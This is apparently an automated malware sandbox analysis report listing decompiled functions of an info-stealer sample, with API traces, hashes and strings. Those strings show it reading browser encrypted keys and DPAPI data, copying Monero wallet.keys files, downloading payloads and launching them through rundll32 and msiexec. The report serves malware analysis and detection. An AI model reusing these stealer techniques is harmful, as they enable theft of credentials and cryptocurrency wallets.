Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66

Strings

.exe, xrefs: 00410A95

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
String ID: .exe
API String ID: 1395395982-4119554291
Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E

Function 00419010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C

Strings

image/jpeg, xrefs: 00419136

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65

Function 004112D0 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00411307
strtok_s.MSVCRT ref: 00411750

Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00899BA0,?,0042110C,?,00000000), ref: 0041A82B
Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95

Function 00412E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
ShellExecuteEx.SHELL32(0000003C), ref: 004134EA

Strings

/passive, xrefs: 0041345B
C:\Windows\system32\msiexec.exe, xrefs: 004134BF
.dll, xrefs: 004131E5
<, xrefs: 00413490
.msi, xrefs: 00413398
/i ", xrefs: 004133E4
C:\Windows\system32\rundll32.exe, xrefs: 00413332
"" , xrefs: 0041309A

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A

Function 008244E7 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00824505
memset.MSVCRT ref: 0082451C

Part of subcall function 00829047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00829072

lstrcat.KERNEL32(?,00000000), ref: 00824553
lstrcat.KERNEL32(?,0064A30C), ref: 00824572
lstrcat.KERNEL32(?,?), ref: 00824586
lstrcat.KERNEL32(?,0064A5D8), ref: 0082459A

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 00828FF7: GetFileAttributesA.KERNEL32(00000000,?,00811DBB,?,?,00425654,?,?,00420E1F), ref: 00829006

Part of subcall function 00819F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 00819FA0
Part of subcall function 00819F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 00819FF9

Part of subcall function 00819C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00819C53
Part of subcall function 00819C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00819C78
Part of subcall function 00819C27: LocalAlloc.KERNEL32(00000040,?), ref: 00819C98
Part of subcall function 00819C27: ReadFile.KERNEL32(000000FF,?,00000000,008116F6,00000000), ref: 00819CC1
Part of subcall function 00819C27: LocalFree.KERNEL32(008116F6), ref: 00819CF7
Part of subcall function 00819C27: CloseHandle.KERNEL32(000000FF), ref: 00819D01

Part of subcall function 00829627: GlobalAlloc.KERNEL32(00000000,00824644,00824644), ref: 0082963A

StrStrA.SHLWAPI(?,0064A0D8), ref: 0082465A
GlobalFree.KERNEL32(?), ref: 00824779

Part of subcall function 00819D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00815155,00000000,00000000), ref: 00819D56
Part of subcall function 00819D27: LocalAlloc.KERNEL32(00000040,?,?,?,00815155,00000000,?), ref: 00819D68
Part of subcall function 00819D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00815155,00000000,00000000), ref: 00819D91
Part of subcall function 00819D27: LocalFree.KERNEL32(?,?,?,?,00815155,00000000,?), ref: 00819DA6

Part of subcall function 0081A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0081A094

lstrcat.KERNEL32(?,00000000), ref: 0082470A
StrCmpCA.SHLWAPI(?,004208D1), ref: 00824727
lstrcat.KERNEL32(00000000,00000000), ref: 00824739
lstrcat.KERNEL32(00000000,?), ref: 0082474C
lstrcat.KERNEL32(00000000,00420FB8), ref: 0082475B

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 1191620704-0
Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
Instruction ID: b8bd1d1c0419b68584dc9ef16ff68d34596ace892940984a9dd0a2706e3ab06b
Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
Instruction Fuzzy Hash: 9D7130B6900218BBDB14EBE4EC49FEE7779FF49300F008598F605D6181DA759A85CB52

Function 00414280 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041429E
memset.MSVCRT ref: 004142B5

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000), ref: 004142EC
lstrcatA.KERNEL32(?,008C94C0), ref: 0041430B
lstrcatA.KERNEL32(?,?), ref: 0041431F
lstrcatA.KERNEL32(?,008C8FC8), ref: 00414333

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F

Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92

Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A

Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3

StrStrA.SHLWAPI(?,008C95B0), ref: 004143F3
GlobalFree.KERNEL32(?), ref: 00414512

Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F

Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D

lstrcatA.KERNEL32(?,00000000), ref: 004144A3
StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
lstrcatA.KERNEL32(00000000,?), ref: 004144E5
lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 1191620704-0
Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95

Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00401327

Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF

lstrcatA.KERNEL32(?,00000000), ref: 0040134F
lstrlenA.KERNEL32(?), ref: 0040135C
lstrcatA.KERNEL32(?,.keys), ref: 00401377

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,008948D0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A

DeleteFileA.KERNEL32(00000000), ref: 004014EF
memset.MSVCRT ref: 00401516

Strings

.keys, xrefs: 0040136B
SOFTWARE\monero-project\monero-core, xrefs: 00401335
\Monero\wallet.keys, xrefs: 0040138D
wallet_path, xrefs: 00401330

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 1930502592-218353709
Opcode ID: 6cf062c6fd381a6a74660f90b2272ae47e9394fe5276f9f8339e4e4fc0c12990
Instruction ID: 456b5fac361f61c5265e43a16bd15ab14158e39c7f71a6669150f14a30e0c61c
Opcode Fuzzy Hash: 6cf062c6fd381a6a74660f90b2272ae47e9394fe5276f9f8339e4e4fc0c12990
Instruction Fuzzy Hash: 565164B1D5011897CB15FB61DD91BED733CAF54304F4041ADB60A62092EE385BD9CBAA

Function 004152C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 138stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,008CAEB0), ref: 00406303
Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,008CA638,00000000,00000000,00400100,00000000), ref: 00406385
Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
lstrlenA.KERNEL32(00000000), ref: 0041532F

Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
lstrlenA.KERNEL32(00000000), ref: 00415383
strtok.MSVCRT(00000000,?), ref: 0041539E
lstrlenA.KERNEL32(00000000), ref: 004153AE

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Strings

ERROR, xrefs: 0041530A
ERROR, xrefs: 004153B9
ERROR, xrefs: 00415432
ERROR, xrefs: 004154A9
ERROR, xrefs: 0041546F

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3532888709-1526165396
Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A

Function 004060A0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
StrCmpCA.SHLWAPI(?,008CAEB0), ref: 00406147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
InternetCloseHandle.WININET(a+A), ref: 00406253
InternetCloseHandle.WININET(00000000), ref: 00406260

Strings

a+A, xrefs: 0040624F, 004061D8, 004061DB, 00406252
a+A, xrefs: 004060B0, 0040617F, 00406266, 00406124, 004060B3

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: a+A$a+A
API String ID: 4287319946-2847607090
Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A

Function 00820CC7 Relevance: 18.2, APIs: 12, Instructions: 205stringprocesssynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

memset.MSVCRT ref: 00820E83
lstrcat.KERNEL32(?,00000000), ref: 00820E9C
lstrcat.KERNEL32(?,00420D7C), ref: 00820EAE
lstrcat.KERNEL32(?,00000000), ref: 00820EC4
lstrcat.KERNEL32(?,00420D80), ref: 00820ED6
lstrcat.KERNEL32(?,00000000), ref: 00820EEF
lstrcat.KERNEL32(?,00420D84), ref: 00820F01
lstrlen.KERNEL32(?), ref: 00820F0E
memset.MSVCRT ref: 00820F34
memset.MSVCRT ref: 00820F48

Part of subcall function 0082AA87: lstrlen.KERNEL32(0081516C,?,?,0081516C,00420DDE), ref: 0082AA92
Part of subcall function 0082AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0082AAEC

Part of subcall function 00828DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00811660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 00828DED

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D

Part of subcall function 00829927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00820DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00829948

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00820FC1
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00820FCD

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
String ID:
API String ID: 1395395982-0
Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
Instruction ID: e844861eeb0fd2a17f3d9dd63a5d8428cfbbbb8af720ed3c866e0143ad32d7ad
Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
Instruction Fuzzy Hash: A48164B5500134ABCB18EBA4ED56FED7779FF44704F404199B206A6082EE746BC8CF5A

Function 00820CB6 Relevance: 18.2, APIs: 12, Instructions: 185stringprocesssynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

memset.MSVCRT ref: 00820E83
lstrcat.KERNEL32(?,00000000), ref: 00820E9C
lstrcat.KERNEL32(?,00420D7C), ref: 00820EAE
lstrcat.KERNEL32(?,00000000), ref: 00820EC4
lstrcat.KERNEL32(?,00420D80), ref: 00820ED6
lstrcat.KERNEL32(?,00000000), ref: 00820EEF
lstrcat.KERNEL32(?,00420D84), ref: 00820F01
lstrlen.KERNEL32(?), ref: 00820F0E
memset.MSVCRT ref: 00820F34
memset.MSVCRT ref: 00820F48

Part of subcall function 0082AA87: lstrlen.KERNEL32(0081516C,?,?,0081516C,00420DDE), ref: 0082AA92
Part of subcall function 0082AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0082AAEC

Part of subcall function 00828DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00811660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 00828DED

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D

Part of subcall function 00829927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00820DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00829948

